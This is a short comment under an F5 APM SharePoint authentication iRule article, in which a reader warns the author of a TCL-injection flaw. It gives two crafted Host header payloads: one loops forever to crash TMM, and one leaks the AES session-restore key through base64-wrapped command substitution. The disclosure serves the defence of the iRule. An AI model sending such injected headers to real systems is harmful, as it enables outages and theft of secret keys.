APM Sharepoint authentication v2
Published May 24, 2017
Version 1.0Was this article helpful?
Hi Stanislas,
you may want to double check your lines 211, 212 and 343. They allow an attacker to perform a TCL-injection attack by sending handcrafted HOST header values.
Remote Code Execution with TMM crash:
Host: www.[while { 1 } { set x 1 }].de
Disclosure of your AES Recovery Key:
Host: www.[b64encode [subst [b64decode JHN0YXRpYzo6c2Vzc2lvbl9yZXN0b3JlX2Flc19rZXk=]]].de
Cheers, Kai